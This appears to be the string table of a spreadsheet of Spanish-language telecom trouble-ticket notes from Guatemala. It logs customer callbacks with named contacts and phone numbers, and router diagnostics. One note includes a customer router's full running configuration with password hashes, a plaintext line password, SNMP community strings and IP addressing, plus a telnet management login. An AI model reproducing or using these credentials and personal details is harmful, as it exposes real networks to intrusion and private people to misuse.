    <t>A NIVEL DE CLARO ENLACE OK, CLIENTE PIDE SE MANTENGA SERVICIO EN MONITOREO POR 24 HORAS, SE DEBE VALIDAR SERVICIO MAÑANA A LAS 17:00 HORAS.</t>
  </si>
  <si>
    <t>F4629121</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 23178400 EXT 8406 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE; ADICIONAL HAY CORREO SEGUIMIENTO.</t>
  </si>
  <si>
    <t>F4629122</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILVER ESTOLFO MENDEZ LOPEZ AL 23178400 EXT 8406 NO RESPONDE || OPERADORA INDICA QUE EL HORARIO DE ATENCION ES DE 8:30 A 17 HRS || SE INTENTARA LUEGO**
-ID 3001033378
**</t>
  </si>
  <si>
    <t>** WILVER MÉNDEZ 2317-8400 EXT. 8406 (CLIENTE) CONFIRMA TODO OK Y AUTORIZA CIERRE DE TICKET -*
*-</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILVER ESTOLFO MENDEZ LOPEZ AL 23178400  EXT 8406  NO RESPONDE || SE INTENTARA LUEGO**
-ID 100104</t>
  </si>
  <si>
    <t>F4629128</t>
  </si>
  <si>
    <t>F4629163</t>
  </si>
  <si>
    <t>CLIENTE ENTERADO QUE DEBEN DE REVISAR A NIVEL LAN COMENTA QUE ESCALARA PERO SOLICITA LLAMADA A LAS 14:00 HORAS UNICAMENTE PARA VER SI DE NUESTRO LADO YA VEMOS EQUIPOS ASOCIADOS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDGAR GEOVANNY BARRERA PINEDA 51196354 / 78595229 SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
-ID 1001034740 - 1001034793
**</t>
  </si>
  <si>
    <t>F4629164</t>
  </si>
  <si>
    <t>SE LOCALIZO A CLIENTE DURANTE TARDE QUIEN INDICA QUE VIO UNA CAIDA LA CUAL NO SE PERCIBIO DURANTE DIAGNOSTICO, SERVICIO SE ENCONTRO ACTIVO CUANDO CLIENTE REPORTO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JOHANNA GARCIA AL  503 79246426 INDICA QUE EL PROBLEMA ES POR LAS TARDES QUE HAY MAS PERSONAS CONECTADAS DE 15:30 A 17:00 HRS || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE  **
-ID 1001052328
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JOHANNA GARCIA AL  503 79246426 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001034121
**</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE LA MAÑANA TODO OK PERO EN LA TARDE ES LA AFETACION, INDICA QUE DE PERCIBIR ALGUNO ESTARA ENVIANDO MENSAJE PARA QUE SE PUEDA APOYAR CON REVISION DEL SERVICIO.</t>
  </si>
  <si>
    <t>F4629167</t>
  </si>
  <si>
    <t>###SE VALIDA CON CLIENTE  JOHANA GARCIA VALIDA EL ENLACE OPERATIVO Y SE PROCEDE A CIERRE###
1001144971
COLA:
NOMBRE: A: 50378696958
NÚMERO: 50378696958
DURACIÓN: 0:49:27
ESTADO: CONECTADA
DETALLES: 50378696958
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 6/07/2022 14:32:22</t>
  </si>
  <si>
    <t>F4629169</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FLORIDALMA LARIAS 22202601 NO REPONDE, SE INTENTARA LUEGO
-ID 1001044850 - 1001045215</t>
  </si>
  <si>
    <t>F4629171</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTINA COMENTA QUE SE PUEDA RELIZAR LA VISITA EL DIA DE MAÑANA A LAS 6:00 AM.
[19:07] JUAN CARLOS LOPEZ SANCHEZ
1001015032
COLA:
NOMBRE: 58260888
NÚMERO: 58260888
DURACIÓN: 0:03:34
ESTADO: CONECTADA
DETALLES: 58260888
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 5/07/2022 19:07:09</t>
  </si>
  <si>
    <t>COORDINADA LA VISITA TÉCNICA A PR MAÑANA A LAS 06:00AM; ADICIONAL SE LLAMÓ/HABLÓ CON MANUEL JUÁREZ/CLIENTE 54170859 Y SE LE BRINDAN AVANCES DEL TICKET.</t>
  </si>
  <si>
    <t>F4629172</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. SANDRA HERNANDEZ 58791721 PROCEDE A UBICAR EQUIPOS ...</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SANDRA HERNANDEZ AL 58791721 SE BRINDA RETROALIMENTACION A CLIENTE **
-ID 1001040486
**</t>
  </si>
  <si>
    <t>F4629181</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE 45060841  NUEVAMENTE NO RESPONDE DE INTENTARÁ VALIDAR NUEVAMENTE. EN UNOS MINUTOS.</t>
  </si>
  <si>
    <t xml:space="preserve">SE ENCUENTRA OPERATIVO A NIVEL WAN SE  TUVO UNA CAÍDA EN LA INTERFACE WAN DEL ROUTER CPE  ESO SIGNIFICA QUE EL EQUIPO DE FIBRA TUVO UNA CAÍDA
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 1 SEMANA.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LUBRICANTES_E_IMPORTACIONES_GT_INTERNET_Z9 UPTIME IS 1 WEEK, 6 DAYS, 4 HOURS, 37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600GN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LUBRICANTES_E_IMPORTACIONES_GT_INTERNET_Z9#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 2419 BYTES
!
VERSION 15.6
NO SERVICE PAD
SERVICE TIMESTAMPS DEBUG DATETIME MSEC
SERVICE TIMESTAMPS LOG DATETIME MSEC
NO SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_LUBRICANTES_E_IMPORTACIONES_GT_INTERNET_Z9
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$3H0G$RUXNVVZ06.RL/FCVVWGND1
!
NO AAA NEW-MODEL
WAN MODE ETHERNET
!
!
!
!
!
!
IP CEF
NO IPV6 CEF
!
!
!
!
!
!
!
!
!
!
!
!
!
USERNAME YXVJOK PRIVILEGE 15 SECRET 5 $1$KQVZ$8NZC4NMXVGZFLUK/S6PRL/
USERNAME GESTIONIP PRIVILEGE 15 SECRET 5 $1$6QAB$U072VAPVRCI2NDUXBLF3T1
!
!
CONTROLLER VDSL 0
 SHUTDOWN
!
!
!
!
!
!
!
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.182.203 255.255.255.255
!
INTERFACE ATM0
 NO IP ADDRESS
 SHUTDOWN
 NO ATM ILMI-KEEPALIVE
!
INTERFACE ETHERNET0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET0
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET1
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET2
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0
 DESCRIPTION LAN DEL CLIENTE
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET1
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET2
 DESCRIPTION WAN PRINCIPAL/_/222800001T/_/
 BANDWIDTH 4096
 IP ADDRESS 10.174.185.41 255.255.255.224
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE VLAN1
 DESCRIPTION LAN_CLIENTE
 IP ADDRESS 216.230.148.81 255.255.255.248
 RATE-LIMIT INPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
!
IP ROUTE 0.0.0.0 0.0.0.0 10.174.185.33
IP SSH SERVER ALGORITHM ENCRYPTION AES128-CTR AES192-CTR AES256-CTR
IP SSH CLIENT ALGORITHM ENCRYPTION AES128-CTR AES192-CTR AES256-CTR
!
!
SNMP-SERVER COMMUNITY MON003486D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION 5 AVENIDA 5-08 ZONA 9
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
!
LINE CON 0
 PASSWORD TELGUA
 LOGIN
 NO MODEM ENABLE
LINE AUX 0
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT INPUT ALL
 STOPBITS 1
LINE VTY 0 4
 PASSWORD TELGUA
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 60000 1000
!
END
CC_LUBRICANTES_E_IMPORTACIONES_GT_INTERNET_Z9#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 97 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 97 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (8192 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
    TRAP LOGGING: LEVEL INFORMATIONAL, 98 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
LOG BUFFER (8192 BYTES):
OWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*JUN 22 19:19:26.655: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C860 SOFTWARE (C860VAE2-ADVSECK9-M), VERSION 15.6(3)M3A, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2017 BY CISCO SYSTEMS, INC.
COMPILED TUE 19-SEP-17 00:39 BY PROD_REL_TEAM
*JUN 22 19:19:26.659: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_LUBRICANTES_E_IMPORTACIONES_GT_INTERNET_Z9 IS UNDERGOING A COLD START
*JUN 22 19:19:26.695: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
*JUN 22 19:19:27.231: %LINK-5-CHANGED: INTERFACE ATM0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 22 19:19:27.243: %LINK-5-CHANGED: INTERFACE ETHERNET0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 22 19:19:27.263: %LINK-5-CHANGED: INTERFACE FASTETHERNET0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 22 19:19:27.263: %LINK-5-CHANGED: INTERFACE FASTETHERNET1, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 22 19:19:27.271: %LINK-5-CHANGED: INTERFACE FASTETHERNET2, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 22 19:19:27.295: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET1, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 22 19:19:27.467: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUN 22 19:19:28.263: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0, CHANGED STATE TO DOWN
*JUN 22 19:19:28.263: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*JUN 22 19:19:28.271: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET2, CHANGED STATE TO DOWN
*JUN 22 19:19:28.295: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET1, CHANGED STATE TO DOWN
*JUN 22 19:19:28.467: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUN 22 19:19:28.475: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE WLAN-GIGABITETHERNET0, CHANGED STATE TO UP
*JUN 22 19:19:30.003: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUN 22 19:19:41.667: %BOOT SECOND FIRMWARE WITH EMBEDDED BINARY.
*JUN 22 19:19:41.831: %BOOT SECOND CORE FIRMWARE
*JUN 22 19:19:54.063: %CONTROLLER-5-UPDOWN: CONTROLLER VDSL 0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 22 19:19:56.831: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
*JUN 22 19:20:19.023: %SYS-6-STACKLOW: STACK FOR LEVEL GENERAL INTERRUPT RUNNING LOW, 0/9000
*JUN 24 19:56:18.319: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUN 24 19:56:19.319: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUN 24 19:59:03.319: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUN 24 19:59:04.319: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUN 24 19:59:41.319: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUN 24 19:59:42.319: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUN 24 19:59:45.319: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUN 24 19:59:46.319: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUN 27 15:32:12.303: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUN 27 15:32:13.303: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUN 27 15:34:49.303: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUN 27 15:34:50.303: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUN 27 15:35:28.303: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUN 27 15:35:29.303: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUN 27 15:35:32.303: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUN 27 15:35:33.303: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUN 30 16:06:21.285: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUN 30 16:06:22.285: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUN 30 16:09:22.285: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUN 30 16:09:23.285: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUN 30 16:09:59.285: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUN 30 16:10:00.285: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUN 30 16:10:01.285: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUN 30 17:05:01.284: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUN 30 17:05:02.284: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUN 30 17:07:58.284: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUN 30 17:07:59.284: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUN 30 17:08:37.284: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUN 30 17:08:38.284: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUN 30 17:08:41.284: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUN 30 17:08:42.284: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUL  5 22:18:21.253: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUL  5 22:18:22.253: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUL  5 22:21:24.253: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUL  5 22:21:25.253: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUL  5 22:22:03.253: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUL  5 22:22:04.253: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUL  5 22:22:07.253: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUL  5 22:22:08.253: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUL  5 23:04:21.253: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUL  5 23:04:22.253: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUL  5 23:07:16.253: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUL  5 23:07:17.253: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUL  5 23:07:51.253: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUL  5 23:07:52.253: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUL  5 23:07:55.253: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUL  5 23:07:56.253: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUL  5 23:13:37.253: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUL  5 23:13:38.253: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUL  5 23:13:41.253: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUL  5 23:13:42.253: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUL  5 23:13:50.253: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUL  5 23:13:51.253: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUL  5 23:16:40.253: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUL  5 23:16:41.253: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUL  5 23:17:17.253: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUL  5 23:17:18.253: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUL  5 23:17:21.253: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*JUL  5 23:17:22.253: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
CC_LUBRICANTES_E_IMPORTACIONES_GT_INTERNET_Z9#
SHOW CLOCK
*23:56:02.045 UTC TUE JUL 5 2022
CC_LUBRICANTES_E_IMPORTACIONES_GT_INTERNET_Z9#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.174.185.33          14   CCBB.FE24.398C  ARPA   GIGABITETHERNET2
INTERNET  10.174.185.41           -   4C71.0C9D.3A05  ARPA   GIGABITETHERNET2
INTERNET  216.230.148.81          -   4C71.0C9D.3A00  ARPA   VLAN1
INTERNET  216.230.148.82         38   04D5.900C.84C3  ARPA   VLAN1
INTERNET  216.230.148.83          0   INCOMPLETE      ARPA
INTERNET  216.230.148.84          0   INCOMPLETE      ARPA
INTERNET  216.230.148.85          0   INCOMPLETE      ARPA
INTERNET  216.230.148.86          0   INCOMPLETE      ARPA
CC_LUBRICANTES_E_IMPORTACIONES_GT_INTERNET_Z9#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
AT0                            ADMIN DOWN     DOWN
ET0                            ADMIN DOWN     DOWN
FA0                            ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
FA1                            ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
FA2                            ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
GI0                            UP             UP       LAN DEL CLIENTE
GI1                            ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
GI2                            UP             UP       WAN PRINCIPAL/_/222800001T/_/
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN_CLIENTE
CC_LUBRICANTES_E_IMPORTACIONES_GT_INTERNET_Z9#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UP                    UP
GIGABITETHERNET1           UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET2           10.174.185.41   YES NVRAM  UP                    UP
LOOPBACK5                  10.212.182.203  YES NVRAM  UP                    UP
VLAN1                      216.230.148.81  YES NVRAM  UP                    UP
CC_LUBRICANTES_E_IMPORTACIONES_GT_INTERNET_Z9#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_METRO 10.174.185.41
  PING 10.174.185.41: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.174.185.41 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/2/5 MS
RUTA IP:
PE: 10.179.28.79
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_METRO 10.174.185.41
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_METRO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.174.185.41/32  DIRECT  0    0                 0.0.0.0         VLANIF3740			</t>
  </si>
  <si>
    <t>F4629230</t>
  </si>
  <si>
    <t xml:space="preserve">
SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MARTES, 5 DE JULIO DE 2022 19:40PARA: TELECOMVPC@ICASA.COM.GT &lt;TELECOMVPC@ICASA.COM.GT&gt;; USCTELECOM@ICASA.COM.GT &lt;USCTELECOM@ICASA.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_CERVECERIA_GT_AGENCIA_MEGA_18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629230
ID: 58700010T
IDENTIFICADOR DEL CLIENTE:  CC_CERVECERIA_GT_AGENCIA_MEGA_18
UBICADO EN:  KM. 9.5 CARRETERA AL ATLANTICO ZONA 18
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4629240</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CRONO ANTERIOR INDICA ENLACE EN MONITOREO POR 6 HORAS A SOLICITUD DE CLIENTE; SE DEBE VALIDAR SERVICIO A LAS 02:00AM</t>
  </si>
  <si>
    <t>F4629244</t>
  </si>
  <si>
    <t>SE LLAMA A ENCARGADO 79427490 NO CONTESTA, ID: 1001021681...</t>
  </si>
  <si>
    <t xml:space="preserve"> SE LLAMA AL PDV 79427490- 47702296 4704-6763 PERO NO RESPONDEN EN NINGUN NUMERO || SE INTENTARA LUEGO **
-ID 1001034742 - 1001034793 - 1001034858
**</t>
  </si>
  <si>
    <t>SE LLAMA A ENCARGADO 47702296 CONTINUA SIN CONTESTAR, ID: 1001021725.
TOMAR NOTA SE PUEDE INGRESAR AL EQUIPO DE ULTIMA MILLA ROUTER CISCO888 PERO SE OBSERVA QUE CPE ROUTER HUAWEI ESTA DESCONECTADO. CLIENTE TIENE QUE REVISAR LA CONEXION ENTRE EL ROUTER CISCO Y EL ROUTER HUAWEI, POSIBLE PROBLEMA DE ENERGIA O CONEXION DEL ROUTER HUAWEI, TIENE QUE ESTAR CONECTADO EN LA FA1.
ZAPOTE#SH RUN INT GIGABITETHERNET1/21.2525
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 183 BYTES
!
INTERFACE GIGABITETHERNET1/21.2525
 DESCRIPTION GESTION CLIENTES MSAN CHIQUIMULA
 ENCAPSULATION DOT1Q 2525
 IP VRF FORWARDING GESTION_CPES
 IP ADDRESS 10.13.56.1 255.255.255.0
END
ZAPOTE#
ZAPOTE#
ZAPOTE#PING VRF GESTION_CPES 10.13.56.7
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 10.13.56.7, TIMEOUT IS 2 SECONDS:
.!!!!
SUCCESS RATE IS 80 PERCENT (4/5), ROUND-TRIP MIN/AVG/MAX = 8/9/12 MS
ZAPOTE#TEL 10.13.56.7 /VRF GESTION_CPES
TRYING 10.13.56.7 ... OPEN
C
####################################################################
#          ______   _       _                                      #
#         (_) |    | |     | |              O                      #
#             | _  | |  _  | |  __   _  _       __   __,           #
#           _ ||/  |/  |/  |/  /  \_/ |/ |  |  /    /  |           #
#          (_/ |__/|__/|__/|__/\__/   |  |_/|_/\___/\_/|_/         #
#                          |\                                      #
#                          |/                                      #
#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
USER ACCESS VERIFICATION
USERNAME: GESTIONIP
PASSWORD:
C
||===================================================||
||  ______   _       _                               ||
|| (_) |    | |     | |              O               ||
||     | _  | |  _  | |  __   _  _       __   __,    ||
||   _ ||/  |/  |/  |/  /  \_/ |/ |  |  /    /  |    ||
||  (_/ |__/|__/|__/|__/\__/   |  |_/|_/\___/\_/|_/  ||
||                  |\                               ||
||                  |/                               ||
||ADVERTENCIA!!                                      ||
||USTED DEBE TENER AUTORIZACION PREVIA PARA EL ACCESO||
||A ESTE SISTEMA. SE REGISTRAN Y SE SUPERVISAN TODAS ||
||LAS CONEXIONES.                                    ||
||===================================================||
MPLS_GRANJERO_G115#SH INT DESC
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
AT0                            UP             UP
AT0.1                          UP             UP
AT0.2                          UP             UP
BR0                            ADMIN DOWN     DOWN
BR0:1                          ADMIN DOWN     DOWN
BR0:2                          ADMIN DOWN     DOWN
